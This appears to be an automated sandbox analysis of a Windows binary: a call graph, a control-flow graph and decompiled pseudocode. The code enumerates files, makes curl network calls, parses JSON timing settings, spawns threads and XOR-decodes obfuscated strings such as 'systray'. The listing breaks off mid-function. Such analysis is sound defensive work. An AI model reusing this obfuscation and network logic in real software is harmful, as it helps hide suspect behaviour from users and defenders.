1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13428->13429 13431 16e992 13429->13431 13431->13385 13434 16e84c 13432->13434 13433->13428 13435 163540 9 API calls 13434->13435 13438 16e88c 13435->13438 13436 16e965 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13436->13433 13437 16e951 _invalid_parameter_noinfo_noreturn 13437->13438 13438->13433 13438->13436 13438->13437 13439 163540 9 API calls 13438->13439 13439->13438 13441 16cc1a 13440->13441 13442 163540 9 API calls 13441->13442 13443 16cd88 13442->13443 13444 163540 9 API calls 13443->13444 13445 16cf46 13444->13445 13445->13445 13446 163540 9 API calls 13445->13446 13447 16d105 13446->13447 13447->13447 13448 163540 9 API calls 13447->13448 13449 16d2e5 13448->13449 13450 163540 9 API calls 13449->13450 13451 16d4b5 13450->13451 13452 163540 9 API calls 13451->13452 13453 16d555 memset GetModuleFileNameW PathRemoveFileSpecW 13452->13453 13454 16d5b6 13453->13454 13454->13454 13455 163540 9 API calls 13454->13455 13456 16d5d8 13455->13456 13457 16d5ed 13456->13457 13458 16de18 13456->13458 13460 16de1d 13457->13460 13461 16d64c 13457->13461 13475 16d5fd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13457->13475 13459 164210 13 API calls 13458->13459 13459->13460 13658 1631f0 ?_Xlength_error@std@@YAXPBD 13460->13658 13467 163260 5 API calls 13461->13467 13463 16a8a0 10 API calls 13465 16d77c 13463->13465 13466 1632d0 12 API calls 13465->13466 13468 16d79b 13466->13468 13469 16d689 13467->13469 13470 1632d0 12 API calls 13468->13470 13471 16d711 memcpy 13469->13471 13472 16d6aa memcpy 13469->13472 13473 16d7ad FindFirstFileW 13470->13473 13471->13475 13474 16d6e3 13472->13474 13472->13475 13476 16d7e6 13473->13476 13511 16d813 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13473->13511 13474->13475 13477 16d6f3 _invalid_parameter_noinfo_noreturn 13474->13477 13475->13463 13480 16d80d _invalid_parameter_noinfo_noreturn 13476->13480 13476->13511 13477->13475 13478 16dc84 13479 16dcd5 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13478->13479 13483 16dccf _invalid_parameter_noinfo_noreturn 13478->13483 13481 16dd17 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13479->13481 13489 16dd11 _invalid_parameter_noinfo_noreturn 13479->13489 13480->13511 13484 16dd59 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13481->13484 13490 16dd53 _invalid_parameter_noinfo_noreturn 13481->13490 13482 16d859 StrCmpIW 13485 16d86f StrCmpIW 13482->13485 13486 16db8a FindNextFileW 13482->13486 13483->13479 13488 16dd9b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13484->13488 13495 16dd95 _invalid_parameter_noinfo_noreturn 13484->13495 13485->13486 13487 16dba5 FindClose 13486->13487 13486->13511 13491 1632d0 12 API calls 13487->13491 13492 16dddd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13488->13492 13498 16ddd7 _invalid_parameter_noinfo_noreturn 13488->13498 13489->13481 13490->13484 13493 16dbda 13491->13493 13494 163190 _invalid_parameter_noinfo_noreturn 13492->13494 13496 1632d0 12 API calls 13493->13496 13497 16ddf2 13494->13497 13495->13488 13499 16dbfc 13496->13499 13500 163190 _invalid_parameter_noinfo_noreturn 13497->13500 13498->13492 13501 1632d0 12 API calls 13499->13501 13502 16ddfd 13500->13502 13503 16dc1e 13501->13503 13504 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13502->13504 13505 1632d0 12 API calls 13503->13505 13506 16de14 13504->13506 13507 16dc40 13505->13507 13506->13389 13508 1632d0 12 API calls 13507->13508 13509 16dc62 13508->13509 13510 1632d0 12 API calls 13509->13510 13510->13478 13511->13478 13511->13482 13511->13486 13513 16c3d0 6 API calls 13512->13513 13514 16f6eb 13513->13514 13515 184650 13 API calls 13514->13515 13516 16f6f4 ??0Value@Json@@QAE@PBD ??AValue@Json@@QAEAAV01@PBD ??4Value@Json@@QAEAAV01@$$QAV01@ ??1Value@Json@@QAE 13515->13516 13518 16f73f 13516->13518 13519 16f763 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13516->13519 13518->13519 13521 16f75d _invalid_parameter_noinfo_noreturn 13518->13521 13520 16c3d0 6 API calls 13519->13520 13522 16f778 13520->13522 13521->13519 13523 184650 13 API calls 13522->13523 13524 16f781 ??0Value@Json@@QAE@PBD ??AValue@Json@@QAEAAV01@PBD ??4Value@Json@@QAEAAV01@$$QAV01@ ??1Value@Json@@QAE 13523->13524 13527 16f7cc 13524->13527 13528 16f7f0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13524->13528 13526 16c3d0 6 API calls 13529 16f808 13526->13529 13527->13528 13530 16f7ea _invalid_parameter_noinfo_noreturn 13527->13530 13528->13526 13531 184650 13 API calls 13529->13531 13530->13528 13532 16f811 ??0Value@Json@@QAE@PBD ??AValue@Json@@QAEAAV01@PBD ??4Value@Json@@QAEAAV01@$$QAV01@ ??1Value@Json@@QAE 13531->13532 13534 16f85c 13532->13534 13535 16f88a 6 API calls 13532->13535 13537 16f880 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13534->13537 13538 16f87a _invalid_parameter_noinfo_noreturn 13534->13538 13659 164600 malloc 13535->13659 13537->13535 13538->13537 13539 16f8fa 13540 164640 10 API calls 13539->13540 13541 16fc4e 13540->13541 13542 1639f0 21 API calls 13541->13542 13543 16fc61 13542->13543 13544 1622d0 6 API calls 13543->13544 13545 16fc95 13544->13545 13546 166e10 4 API calls 13545->13546 13547 16fca4 13546->13547 13548 167680 42 API calls 13547->13548 13549 16fcc5 13548->13549 13550 163450 9 API calls 13549->13550 13551 16fce6 13550->13551 13552 163450 9 API calls 13551->13552 13553 16fd0b 13552->13553 13554 16c460 12 API calls 13553->13554 13555 16fd22 13554->13555 13556 167760 _invalid_parameter_noinfo_noreturn 13555->13556 13557 16fd4a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13556->13557 13557->13557 13558 163450 9 API calls 13557->13558 13559 16ff86 13558->13559 13560 167650 9 API calls 13559->13560 13561 16ff99 13560->13561 13562 16ffc9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13561->13562 13564 16ffc3 _invalid_parameter_noinfo_noreturn 13561->13564 13660 167340 13562->13660 13564->13562 13565 16ffe5 13566 1676b0 2 API calls 13565->13566 13567 170004 13566->13567 13665 167300 13567->13665 13570 17003e 13571 163650 39 API calls 13570->13571 13573 17008c 13571->13573 13572 162440 2 API calls 13572->13570 13670 164600 malloc 13573->13670 13575 1700b3 13576 164640 10 API calls 13575->13576 13577 1703de 13576->13577 13578 170408 13577->13578 13579 163450 9 API calls 13577->13579 13580 164620 free 13578->13580 13579->13578 13581 170413 13580->13581 13582 170442 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13581->13582 13584 17043c _invalid_parameter_noinfo_noreturn 13581->13584 13583 170493 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13582->13583 13586 17048d _invalid_parameter_noinfo_noreturn 13582->13586 13585 16c920 3 API calls 13583->13585 13584->13582 13587 1704c3 13585->13587 13586->13583 13588 170500 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13587->13588 13590 1704fa _invalid_parameter_noinfo_noreturn 13587->13590 13589 170557 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13588->13589 13593 170551 _invalid_parameter_noinfo_noreturn 13588->13593 13591 1705ae std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13589->13591 13594 1705a8 _invalid_parameter_noinfo_noreturn 13589->13594 13590->13588 13592 170605 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13591->13592 13596 1705ff _invalid_parameter_noinfo_noreturn 13591->13596 13595 164620 free 13592->13595 13593->13589 13594->13591 13597 170635 13595->13597 13596->13592 13598 170667 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13597->13598 13600 170661 _invalid_parameter_noinfo_noreturn 13597->13600 13599 16cab0 4 API calls 13598->13599 13601 170697 ??1Value@Json@@QAE 13599->13601 13600->13598 13602 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13601->13602 13603 1706b9 13602->13603 13603->13392 13605 16b162 13604->13605 13606 16b1bb memcpy 13605->13606 13607 16b178 memcpy 13605->13607 13606->13400 13612 16aa20 13607->13612 13610 16b195 13610->13606 13611 16aa20 5 API calls 13610->13611 13611->13610 13613 16aa60 13612->13613 13613->13613 13614 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13613->13614 13615 16b122 13614->13615 13615->13610 13617 16a7cd 13616->13617 13623 16a846 13616->13623 13620 16b130 7 API calls 13617->13620 13618 1755f4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 13619 16a13c 13618->13619 13624 16a2e0 13619->13624 13621 16a839 13620->13621 13622 16b130 7 API calls 13621->13622 13622->13623 13623->13618 13625 16a345 13624->13625 13641 16a3d6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13624->13641 13627 16a41c 13625->13627 13630 16a356 13625->13630 13625->13641 13626 16a148 13626->13406 13631 166160 2 API calls 13627->13631 13627->13641 13628 16a735 13656 1631f0 ?_Xlength_error@std@@YAXPBD 13628->13656 13630->13628 13633 163200 5 API calls 13630->13633 13631->13641 13634 16a3a6 13633->13634 13635 16a405 memcpy 13634->13635 13636 16a3c1 memcpy 13634->13636 13635->13641 13636->13641 13637 16a3ff _invalid_parameter_noinfo_noreturn 13637->13635 13638 16a535 memcpy 13638->13641 13639 16a588 memcpy 13639->13641 13640 175703 _callnewh malloc _CxxThrowException _CxxThrowException std::_Facet_Register 13640->13641 13641->13626 13641->13628 13641->13637 13641->13638 13641->13639 13641->13640 13642 16a697 memcpy 13641->13642 13643 16a6ea memcpy 13641->13643 13642->13641 13643->13641 13646 169f40 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 13644->13646 13645 16a07b 13645->13410 13645->13412 13646->13645 13647 16a08f 13646->13647 13651 163260 5 API calls 13646->13651 13653 169fe6 memcpy 13646->13653 13654 16a04e memcpy 13646->13654 13655 16a048 _invalid_parameter_noinfo_noreturn 13646->13655 13657 1631f0 ?_Xlength_error@std@@YAXPBD 13647->13657 13651->13646 13653->13646 13654->13646 13655->13654 13659->13539 13661 16734f curl_easy_setopt 13660->13661 13662 16737b 13660->13662 13663 16736a curl_easy_setopt 13661->13663 13664 167368 13661->13664 13662->13565 13663->13662 13664->13663 13666 167311 curl_easy_setopt curl_easy_setopt 13665->13666 13667 167328 13665->13667 13666->13667 13668 167b50 85 API calls 13667->13668 13669 167334 13668->13669 13669->13570 13669->13572 13670->13575

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 1745a0-17463c call 163540 call 173510 ??0Value@Json@@QAE@W4ValueType@1@@Z ??0Reader@Json@@QAE@XZ ?parse@Reader@Json@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVValue@2@_N@Z 5 174642-174661 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 0->5 6 174b58-174b5f 0->6 7 174665-17467c atoi 5->7 8 174663 5->8 9 174e37-174e7f _beginthreadex call 16c700 ??1Value@Json@@QAE@XZ call 1755f4 6->9 10 174b65-174b8b 6->10 12 17467e-17468a 7->12 13 1746ac-1746cb ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 7->13 8->7 14 174b91-174b96 10->14 15 174c4a-174c6e 10->15 20 1746a2-1746a9 call 175733 12->20 21 17468c-17469a 12->21 18 1746cf-1746e0 atoi 13->18 19 1746cd 13->19 22 174c20-174c48 14->22 23 174b9c-174c18 14->23 17 174c70-174c79 15->17 17->17 26 174c7b-174caf call 163540 17->26 27 1746e2-1746ee 18->27 28 174710-17472f ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 18->28 19->18 20->13 21->20 29 17469c _invalid_parameter_noinfo_noreturn 21->29 22->15 22->22 23->15 44 174cb5-174cba 26->44 45 174dea-174e08 26->45 33 174706-17470d call 175733 27->33 34 1746f0-1746fe 27->34 35 174733-174744 atoi 28->35 36 174731 28->36 29->20 33->28 34->33 38 174700 _invalid_parameter_noinfo_noreturn 34->38 40 174746-174752 35->40 41 174774-174793 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 35->41 36->35 38->33 42 174754-174762 40->42 43 17476a-174771 call 175733 40->43 46 174797-1747a8 atoi 41->46 47 174795 41->47 42->43 49 174764 _invalid_parameter_noinfo_noreturn 42->49 43->41 51 174dc0-174de8 44->51 52 174cc0-174dba 44->52 55 174e10-174e19 45->55 53 1747aa-1747b6 46->53 54 1747d8-1747f7 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 46->54 47->46 49->43 51->45 51->51 52->51 57 1747ce-1747d5 call 175733 53->57 58 1747b8-1747c6 53->58 60 1747fb-17480c atoi 54->60 61 1747f9 54->61 55->55 59 174e1b-174e34 call 163540 call 1811c0 55->59 57->54 58->57 64 1747c8 _invalid_parameter_noinfo_noreturn 58->64 59->9 62 17480e-17481a 60->62 63 17483c-17485b ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 60->63 61->60 67 174832-174839 call 175733 62->67 68 17481c-17482a 62->68 69 17485f-174870 atoi 63->69 70 17485d 63->70 64->57 67->63 68->67 73 17482c _invalid_parameter_noinfo_noreturn 68->73 75 174872-17487e 69->75 76 1748a0-1748c5 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 69->76 70->69 73->67 81 174896-17489d call 175733 75->81 82 174880-17488e 75->82 78 1748c7 76->78 79 1748c9-1748ce 76->79 78->79 84 1748d1-1748d6 79->84 81->76 82->81 85 174890 _invalid_parameter_noinfo_noreturn 82->85 84->84 87 1748d8-1748f1 call 163450 84->87 85->81 91 1748f3-1748ff 87->91 92 174921-174940 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 87->92 93 174917-17491e call 175733 91->93 94 174901-17490f 91->94 95 174944-174955 atoi 92->95 96 174942 92->96 93->92 94->93 99 174911 _invalid_parameter_noinfo_noreturn 94->99 97 174957-174963 95->97 98 174985-1749a4 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 95->98 96->95 101 174965-174973 97->101 102 17497b-174982 call 175733 97->102 103 1749a6 98->103 104 1749a8-1749b9 atoi 98->104 99->93 101->102 106 174975 _invalid_parameter_noinfo_noreturn 101->106 102->98 103->104 108 1749bb-1749c7 104->108 109 1749e9-174a08 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 104->109 106->102 113 1749df-1749e6 call 175733 108->113 114 1749c9-1749d7 108->114 110 174a0c-174a1d atoi 109->110 111 174a0a 109->111 115 174a1f-174a2b 110->115 116 174a4d-174a6c ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ 110->116 111->110 113->109 114->113 117 1749d9 _invalid_parameter_noinfo_noreturn 114->117 119 174a43-174a4a call 175733 115->119 120 174a2d-174a3b 115->120 121 174a70-174a81 atoi 116->121 122 174a6e 116->122 117->113 119->116 120->119 124 174a3d _invalid_parameter_noinfo_noreturn 120->124 126 174a83-174a8f 121->126 127 174ab1-174b15 call 163450 ??AValue@Json@@QAEAAV01@PBD@Z ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ call 173bd0 121->127 122->121 124->119 130 174aa7-174aae call 175733 126->130 131 174a91-174a9f 126->131 138 174b17-174b1e 127->138 139 174b33-174b3a 127->139 130->127 131->130 133 174aa1 _invalid_parameter_noinfo_noreturn 131->133 133->130 138->139 140 174b20-174b30 _beginthreadex 138->140 139->6 141 174b3c-174b43 139->141 140->139 141->6 142 174b45-174b55 _beginthreadex 141->142 142->6
                                                                                        C-Code - Quality: 23%
                                                                                        			E001745A0(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				char _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				char _v52;
                                                                                        				char _v168;
                                                                                        				char _v192;
                                                                                        				intOrPtr _v196;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t130;
                                                                                        				void* _t137;
                                                                                        				char _t140;
                                                                                        				char _t141;
                                                                                        				intOrPtr _t144;
                                                                                        				intOrPtr _t148;
                                                                                        				char* _t168;
                                                                                        				int _t169;
                                                                                        				char* _t170;
                                                                                        				int _t171;
                                                                                        				char* _t172;
                                                                                        				int _t173;
                                                                                        				char* _t174;
                                                                                        				int _t175;
                                                                                        				char* _t176;
                                                                                        				int _t177;
                                                                                        				char* _t178;
                                                                                        				int _t179;
                                                                                        				intOrPtr* _t180;
                                                                                        				intOrPtr _t182;
                                                                                        				char* _t184;
                                                                                        				int _t185;
                                                                                        				char* _t186;
                                                                                        				int _t187;
                                                                                        				char* _t188;
                                                                                        				int _t189;
                                                                                        				char* _t190;
                                                                                        				int _t191;
                                                                                        				intOrPtr _t196;
                                                                                        				intOrPtr _t199;
                                                                                        				intOrPtr _t202;
                                                                                        				intOrPtr _t205;
                                                                                        				intOrPtr _t208;
                                                                                        				intOrPtr _t211;
                                                                                        				intOrPtr _t214;
                                                                                        				intOrPtr _t217;
                                                                                        				intOrPtr _t220;
                                                                                        				intOrPtr _t223;
                                                                                        				intOrPtr _t226;
                                                                                        				short* _t231;
                                                                                        				intOrPtr* _t243;
                                                                                        				intOrPtr* _t247;
                                                                                        				intOrPtr* _t271;
                                                                                        				char* _t282;
                                                                                        				intOrPtr _t285;
                                                                                        				char _t286;
                                                                                        				char _t287;
                                                                                        				char _t288;
                                                                                        				char _t289;
                                                                                        				char _t290;
                                                                                        				char _t291;
                                                                                        				char _t292;
                                                                                        				char _t293;
                                                                                        				intOrPtr _t294;
                                                                                        				char _t295;
                                                                                        				short* _t297;
                                                                                        				short* _t298;
                                                                                        				intOrPtr _t305;
                                                                                        				intOrPtr _t306;
                                                                                        				intOrPtr _t307;
                                                                                        				intOrPtr _t308;
                                                                                        				intOrPtr _t309;
                                                                                        				intOrPtr _t310;
                                                                                        				intOrPtr* _t311;
                                                                                        				intOrPtr _t312;
                                                                                        				intOrPtr _t313;
                                                                                        				intOrPtr _t314;
                                                                                        				intOrPtr _t315;
                                                                                        				intOrPtr _t316;
                                                                                        				void* _t317;
                                                                                        				void* _t318;
                                                                                        				void* _t319;
                                                                                        				void* _t320;
                                                                                        				void* _t321;
                                                                                        				void* _t322;
                                                                                        				void* _t323;
                                                                                        				void* _t324;
                                                                                        				void* _t325;
                                                                                        				void* _t326;
                                                                                        				void* _t327;
                                                                                        				void* _t328;
                                                                                        				intOrPtr _t330;
                                                                                        				void* _t331;
                                                                                        				void* _t333;
                                                                                        				void* _t334;
                                                                                        				signed int _t335;
                                                                                        				signed int _t336;
                                                                                        				intOrPtr* _t338;
                                                                                        				signed int _t339;
                                                                                        				void* _t340;
                                                                                        				short* _t342;
                                                                                        				short* _t344;
                                                                                        				short* _t345;
                                                                                        				void* _t346;
                                                                                        				void* _t347;
                                                                                        				void* _t348;
                                                                                        				void* _t349;
                                                                                        				void* _t350;
                                                                                        				void* _t351;
                                                                                        				void* _t352;
                                                                                        				void* _t353;
                                                                                        				void* _t354;
                                                                                        				void* _t355;
                                                                                        				char* _t356;
                                                                                        				void* _t357;
                                                                                        
                                                                                        				_t229 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_t130 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v20 = _t130 ^ _t339;
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t328 = __ecx;
                                                                                        				_t342 = _t340 - 0x9c;
                                                                                        				_t231 = _t342;
                                                                                        				 *((intOrPtr*)(_t231 + 0x10)) = 0;
                                                                                        				 *((intOrPtr*)(_t231 + 0x14)) = 7;
                                                                                        				 *_t231 = 0;
                                                                                        				E00163540(__ebx, __edx, __ecx, L"systray");
                                                                                        				E00173510(__ecx, 7, 0, _t130 ^ _t339, _t327, _t331,  *[fs:0x0], E0018DA01); // executed
                                                                                        				_push(0);
                                                                                        				L00176836();
                                                                                        				_v8 = 0;
                                                                                        				L0017686C();
                                                                                        				_push(1);
                                                                                        				_v8 = 1;
                                                                                        				_push( &_v192);
                                                                                        				_t10 = _t328 + 0xac; // 0x13c1cec
                                                                                        				_t137 = _t10;
                                                                                        				_push(_t137);
                                                                                        				L00176872();
                                                                                        				if(_t137 == 0) {
                                                                                        					L86:
                                                                                        					if( *0x19dbbc == 0) {
                                                                                        						L100:
                                                                                        						__imp___beginthreadex(0, 0x173f90, 0, 0, 0); // executed
                                                                                        						E0016C700(_t229,  &_v168, 0);
                                                                                        						L00176854();
                                                                                        						 *[fs:0x0] = _v16;
                                                                                        						return E001755F4(_v20 ^ _t339);
                                                                                        					}
                                                                                        					_t140 =  *0x190b84; // 0x66001c
                                                                                        					_t330 =  *0x19dc40; // 0x5
                                                                                        					_v52 = _t140;
                                                                                        					_t141 = L"F6systray"; // 0x360046
                                                                                        					_v48 = _t141;
                                                                                        					if(L"6systray" == 0) {
                                                                                        						L91:
                                                                                        						_t344 = _t342 - 0x18;
                                                                                        						_t243 =  &_v52;
                                                                                        						_t297 = _t344;
                                                                                        						_v196 = _t344;
                                                                                        						_t333 = _t243 + 2;
                                                                                        						 *((intOrPtr*)(_t297 + 0x10)) = 0;
                                                                                        						 *((intOrPtr*)(_t297 + 0x14)) = 7;
                                                                                        						 *_t297 = 0;
                                                                                        						do {
                                                                                        							_t144 =  *_t243;
                                                                                        							_t243 = _t243 + 2;
                                                                                        						} while (_t144 != 0);
                                                                                        						_push(_t243 - _t333 >> 1);
                                                                                        						E00163540(_t229, _t297, _t330,  &_v52);
                                                                                        						asm("movups xmm0, [0x190b6c]");
                                                                                        						_v8 = 4;
                                                                                        						asm("movups [ebp-0x28], xmm0");
                                                                                        						asm("movq xmm0, [0x190b7c]");
                                                                                        						asm("movq [ebp-0x18], xmm0");
                                                                                        						if( *0x190b82 == 0) {
                                                                                        							L97:
                                                                                        							_t345 = _t344 - 0x18;
                                                                                        							_t247 =  &_v44;
                                                                                        							_t298 = _t345;
                                                                                        							_t334 = _t247 + 2;
                                                                                        							 *((intOrPtr*)(_t298 + 0x10)) = 0;
                                                                                        							 *((intOrPtr*)(_t298 + 0x14)) = 7;
                                                                                        							 *_t298 = 0;
                                                                                        							do {
                                                                                        								_t148 =  *_t247;
                                                                                        								_t247 = _t247 + 2;
                                                                                        							} while (_t148 != 0);
                                                                                        							_push(_t247 - _t334 >> 1);
                                                                                        							E00163540(_t229, _t298, _t330,  &_v44);
                                                                                        							_v8 = 1;
                                                                                        							E001811C0(_t330);
                                                                                        							_t342 = _t345 + 0x30;
                                                                                        							goto L100;
                                                                                        						}
                                                                                        						_t335 = 0;
                                                                                        						if(_t330 >= 2) {
                                                                                        							asm("movaps xmm2, [0x18ffd0]");
                                                                                        							asm("movaps xmm4, [0x190d30]");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							_t335 = 8;
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("movd xmm5, eax");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("movd xmm6, eax");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("movaps xmm2, [0x18ffe0]");
                                                                                        							asm("paddd xmm2, [0x18ffd0]");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("paddw xmm1, [0x190000]");
                                                                                        							asm("movq xmm0, [eax]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("movq [ebp-0x28], xmm1");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x190d00]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [ebp-0x20]");
                                                                                        							asm("paddw xmm1, [0x190000]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movq [ebp-0x20], xmm1");
                                                                                        							asm("o16 nop [eax+eax]");
                                                                                        						}
                                                                                        						do {
                                                                                        							 *(_t339 + _t335 * 2 - 0x28) =  *(_t339 + _t335 * 2 - 0x28) ^ (0x00000001 - ((0xa0a0a0a1 * _t335 >> 0x00000020) + _t335 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t335 >> 0x00000020) + _t335 >> 0x00000005)) * 0x00000033 + _t335;
                                                                                        							_t335 = _t335 + 1;
                                                                                        						} while (_t335 < 0xc);
                                                                                        						goto L97;
                                                                                        					}
                                                                                        					_t336 = 0;
                                                                                        					if(_t330 < 2) {
                                                                                        						do {
                                                                                        							 *(_t339 + _t336 * 2 - 0x30) =  *(_t339 + _t336 * 2 - 0x30) ^ (0x00000001 - ((0xa0a0a0a1 * _t336 >> 0x00000020) + _t336 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t336 >> 0x00000020) + _t336 >> 0x00000005)) * 0x00000033 + _t336;
                                                                                        							_t336 = _t336 + 1;
                                                                                        						} while (_t336 < 4);
                                                                                        						goto L91;
                                                                                        					}
                                                                                        					asm("movups xmm3, [0x18ffd0]");
                                                                                        					asm("movaps xmm2, xmm3");
                                                                                        					asm("movaps xmm0, xmm3");
                                                                                        					asm("punpckhdq xmm0, xmm3");
                                                                                        					asm("pmuldq xmm0, [0x190d30]");
                                                                                        					asm("punpckldq xmm2, xmm3");
                                                                                        					asm("pmuldq xmm2, [0x190d30]");
                                                                                        					asm("shufps xmm2, xmm0, 0xdd");
                                                                                        					asm("movd xmm0, eax");
                                                                                        					asm("paddd xmm2, xmm3");
                                                                                        					asm("psrad xmm2, xmm0");
                                                                                        					asm("movd xmm0, ecx");
                                                                                        					asm("movaps xmm1, xmm2");
                                                                                        					asm("psrld xmm1, xmm0");
                                                                                        					asm("paddd xmm1, xmm2");
                                                                                        					asm("pmulld xmm1, [0x190d00]");
                                                                                        					asm("psubd xmm3, xmm1");
                                                                                        					asm("pshuflw xmm0, xmm3, 0xd8");
                                                                                        					asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        					asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        					asm("paddw xmm1, [0x190000]");
                                                                                        					asm("movq xmm0, [eax]");
                                                                                        					asm("pxor xmm1, xmm0");
                                                                                        					asm("movq [ebp-0x30], xmm1");
                                                                                        					goto L91;
                                                                                        				} else {
                                                                                        					_t168 =  &_v44;
                                                                                        					_push(_t168);
                                                                                        					_push("time1");
                                                                                        					L00176866();
                                                                                        					L00176860();
                                                                                        					if(_t168[0x14] >= 0x10) {
                                                                                        						_t168 =  *_t168;
                                                                                        					}
                                                                                        					_t169 = atoi(_t168);
                                                                                        					_t305 = _v24;
                                                                                        					_t346 = _t342 + 4;
                                                                                        					 *0x19dbac = _t169;
                                                                                        					if(_t305 >= 0x10) {
                                                                                        						_t295 = _v44;
                                                                                        						_t326 = _t305 + 1;
                                                                                        						_t226 = _t295;
                                                                                        						if(_t326 >= 0x1000) {
